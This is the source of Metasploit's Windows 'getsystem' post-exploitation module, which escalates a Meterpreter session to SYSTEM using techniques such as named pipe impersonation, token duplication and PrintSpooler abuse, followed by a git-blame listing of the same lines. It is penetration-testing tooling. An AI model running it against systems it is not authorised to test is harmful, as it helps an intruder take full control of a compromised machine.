modules/post/windows/escalate/getsystem.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasm'

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Escalation',
        'Description' => %q{
          This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various
          techniques.
        },
        'License' => MSF_LICENSE,
        'Author' => 'hdm',
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              priv_elevate_getsystem
            ]
          }
        },
        'Notes' => {
          'AKA' => [
            'Named Pipe Impersonation',
            'Token Duplication',
            'RPCSS',
            'PrintSpooler',
            'EFSRPC',
            'EfsPotato'
          ]
        }
      )
    )

    register_options([
      OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])
    ])
  end

  def unsupported
    print_error('This platform is not supported with this script!')
    raise Rex::Script::Completed
  end

  def run
    technique = datastore['TECHNIQUE'].to_i

    unsupported if client.platform != 'windows' || (client.arch != ARCH_X64 && client.arch != ARCH_X86)

    if is_system?
      print_good('This session already has SYSTEM privileges')
      return
    end

    begin
      result = client.priv.getsystem(technique)
      print_good("Obtained SYSTEM via technique #{result[1]}")
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error('Failed to obtain SYSTEM access')
    end
  end
end
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`##`

			`require 'metasm'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Post`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`include Msf::Post::Windows::Priv`
Retab modules 2013-08-30 16:28:54 -05:00
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
Add getsystem module docs 2022-09-16 14:53:45 -04:00			`'Name' => 'Windows Escalation',`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'Description' => %q{`
Add getsystem module docs 2022-09-16 14:53:45 -04:00			This module uses the `getsystem` command to escalate the current session to the SYSTEM account using various
			`techniques.`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => 'hdm',`
			`'Platform' => [ 'win' ],`
Add Meterpreter compatibility metadata 2021-10-06 13:43:31 +01:00			`'SessionTypes' => [ 'meterpreter' ],`
			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`priv_elevate_getsystem`
			`]`
			`}`
getsytem module: use ACTION instead of TECHNIQUE datastore option 2022-06-14 15:31:33 +02:00			`},`
			`'Notes' => {`
			`'AKA' => [`
			`'Named Pipe Impersonation',`
			`'Token Duplication',`
			`'RPCSS',`
			`'PrintSpooler',`
			`'EFSRPC',`
			`'EfsPotato'`
			`]`
Add Meterpreter compatibility metadata 2021-10-06 13:43:31 +01:00			`}`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`)`
			`)`
Revert to TECHNIQUE datastore option for backwards compatibility 2022-06-23 18:43:18 +02:00
			`register_options([`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`OptInt.new('TECHNIQUE', [false, 'Specify a particular technique to use (1-6), otherwise try them all', 0])`
Revert to TECHNIQUE datastore option for backwards compatibility 2022-06-23 18:43:18 +02:00			`])`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`def unsupported`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_error('This platform is not supported with this script!')`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`raise Rex::Script::Completed`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`def run`
Revert to TECHNIQUE datastore option for backwards compatibility 2022-06-23 18:43:18 +02:00			`technique = datastore['TECHNIQUE'].to_i`
Retab modules 2013-08-30 16:28:54 -05:00
Final pass of regex -> string checks 2016-10-29 14:59:05 +10:00			`unsupported if client.platform != 'windows' \|\| (client.arch != ARCH_X64 && client.arch != ARCH_X86)`
Retab modules 2013-08-30 16:28:54 -05:00
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`if is_system?`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_good('This session already has SYSTEM privileges')`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
handle exception in getsystem module 2016-08-15 23:51:05 -05:00			`begin`
			`result = client.priv.getsystem(technique)`
			`print_good("Obtained SYSTEM via technique #{result[1]}")`
			`rescue Rex::Post::Meterpreter::RequestError => e`
Run rubocop on post modules 2023-02-08 13:47:34 +00:00			`print_error('Failed to obtain SYSTEM access')`
Add a getsystem post module for automation 2011-11-11 16:19:49 -06:00			`end`
			`end`
			`end`